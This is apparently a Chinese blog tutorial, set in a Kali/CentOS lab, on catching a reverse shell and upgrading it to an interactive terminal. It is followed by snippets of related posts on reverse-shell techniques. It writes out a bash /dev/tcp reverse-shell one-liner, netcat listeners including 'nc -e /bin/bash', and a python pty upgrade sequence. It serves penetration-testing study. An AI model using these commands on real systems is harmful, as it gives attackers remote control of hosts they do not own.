mysql 反弹shell_反弹shell升级成交互式shell
实验环境:
A : kali 虚拟机
B: centos7.5 虚拟机
1. A 机 kali 虚拟机 设置监听 端口
root@kali64:~# nc -lvvp 9001
# 端口随便定义,没被使用就行
2. B机 执行命令反弹shell
[root@localhost ~]# bash -i >& /dev/tcp/192.168.2.128/9001 0>&1
# ip地址为 kali 虚拟机的ip地址,端口为kali虚拟机监听的端口 主机ip和端口之间为`/`
补充:
标准输入 (stdin) :代码为 0
标准输出 (stdout):代码为 1
标准错误 (stderr):代码为 2
> 为重定向符号 , & 没有固定的意思
&> ,>&理解成一个整体
&>file # 将 标准输出 和 标准错误输出 都重定向到文件file中
>& # 将标准输出和标准错误输出重定向到文件/dev/tcp/,即传递到远程
2>&1 # 将标准错误重定向到标准输出中
0>&1 # 将标准输入重定向到标准输出中
反弹后再kali机上面查看,可以输入命令,不支持tab键,清屏等功能,需要升级成交互式shell
3.升级交互式shell
# 以下命令都是在kali 机上面操作
[root@localhost ~]# python -c 'import pty; pty.spawn("/bin/bash")' #使用python
[root@localhost ~]# ^Z # ctrl + z 按键 挂起正在运行的程序
root@kali64:~# stty raw -echo # 输入这句后 在输入命令终端不在显示
root@kali64:~# fg # 把后台挂起的程序,放到控制台----》 终端不显示命令,输入后回车
[root@localhost ~]# reset
[root@localhost ~]# export SHELL=bash
退回到kali机
# 以下命令都在kali机上面操作
[root@localhost ~]# exit # 退出终端
[root@localhost ~]# exit # 看前面主机名和用户来区分,继续退出,
root@kali64:~#
# 看到主机名变为kali说明回到kali机上面了------ 此时输入命令是不显示的
root@kali64:~# reset # 将终端恢复至原始状态
补充:
stty -echo # 禁止回显,当在键盘上输入时,并不出现在屏幕上
stty echo # 打开回显
stty raw # 设置原始输入
stty -raw # 关闭原始输入
bg # 将一个在后台暂停的命令,变成继续执行
fg # 将后台中的命令调至前台继续运行
jobs # 查看当前有多少在后台运行的命令
ctrl + z # 可以将一个正在前台执行的命令放到后台,并且暂停
clear # 清屏,本质上只是让终端显示页向后翻了一页,如果向上滚动屏幕还可以看到之前的操作信息。
reset # 将终端恢复至原始状态,之前的终端输入操作信息将都会被清空
mysql 反弹shell_反弹shell升级成交互式shell相关推荐
- 交互式shell和非交互式shell、登录shell和非登录shell
交互式shell和非交互式shell.登录shell和非登录shell: 我们在图形交互界面操作时,是交互式的,先理解交互式下的登陆和非登录概念: 概念 举例 特点 登陆shell 用户登陆时,输入用 ...
- 反弹Shell升级为交互式Shel
前言 经常我们拿到的shell是一个简单的shell 如何把一个简单的shell就升级到一个标准交互式shell 写这篇文章记录一下 正文 攻击机:kali 靶机:ubuntu 普通Shell 给ka ...
- python反弹shell_反弹shell的各种姿势
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入. 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步.所有姿势 ...
- python反弹shell_反弹Shell小结
1.NC反弹shell 1.1.正向反弹shell 服务器 nc -lvvp 7777 -e /bin/bash 攻击机 nc server-ip 7777 1.2.反向反弹shell 攻击机 nc ...
- python反弹shell_反弹shell的几种方式总结
假设本机地址10.10.10.11,监听端口443. 1.Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: bash -i ...
- python3 -c ‘import pty;pty.spawn(“/bin/bash“)‘升级切换交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm Ctrl+Z stty -a stty raw - ...
- linux 非登录shell自动,Linux登录shell和非登录(交互式shell)环境变量配置
使用Jenkins执行shell脚本的时候, 碰到command not found. 比如java mvn, 这些环境变量配置在/etc/profile 中, 但jenkins执行的时候并没有加载. ...
- php 与shell,[转]PHP与Shell交互
From : http://blog.csdn.net/houqd2012/article/details/8219199 最近想使用PHP与Sheel进行交互.PHP控制显示和高层的逻辑结构.She ...
- shell从入门到精通(25)你知道什么是login shell和non login shell吗
bash有几种不同的运行模式,login shell与non-login shell,interactive shell与non-interactive shell(比如执行shell脚本).这两种分 ...
最新文章
- LeetCode简单题之找出井字棋的获胜者
- bos开发时,测试卡在登录界面解决
- [转]Eclipse中的Web项目自动部署到Tomcat
- AndroidStudio SSL peer shut down incorrectly
- vim的常用配置及使用方法
- Hbase shell 常用命令
- .NET Core下的Spring Cloud——前言和概述
- 库存出现负数 mysql_前台支付商品成功后,sku表库存,购买数量会重复执行减操作好几次了,导致库存为负数...
- python之通过thread来实现多进程
- 电子招标是未来的招投标趋势
- 51中断编程c语言,有关51单片机中断的形式和C语言编程格式[精选5篇]
- 详解分级基金(杠杆基金)【精华】 【转】
- Java:冒泡排序法
- Nginx配置支持mp4视频流播放,超简单
- 渐变文件夹,一定要收下这两套超级精美的文件夹图标!
- python的mapl画图y轴排_Python三维绘图之Matplotlib库的使用方法
- 如何用vscode替代xshell
- java枚举类Enum入门理解
- 【来日复制粘贴】关于排名
- 第一章(简述数据清洗的基本流程)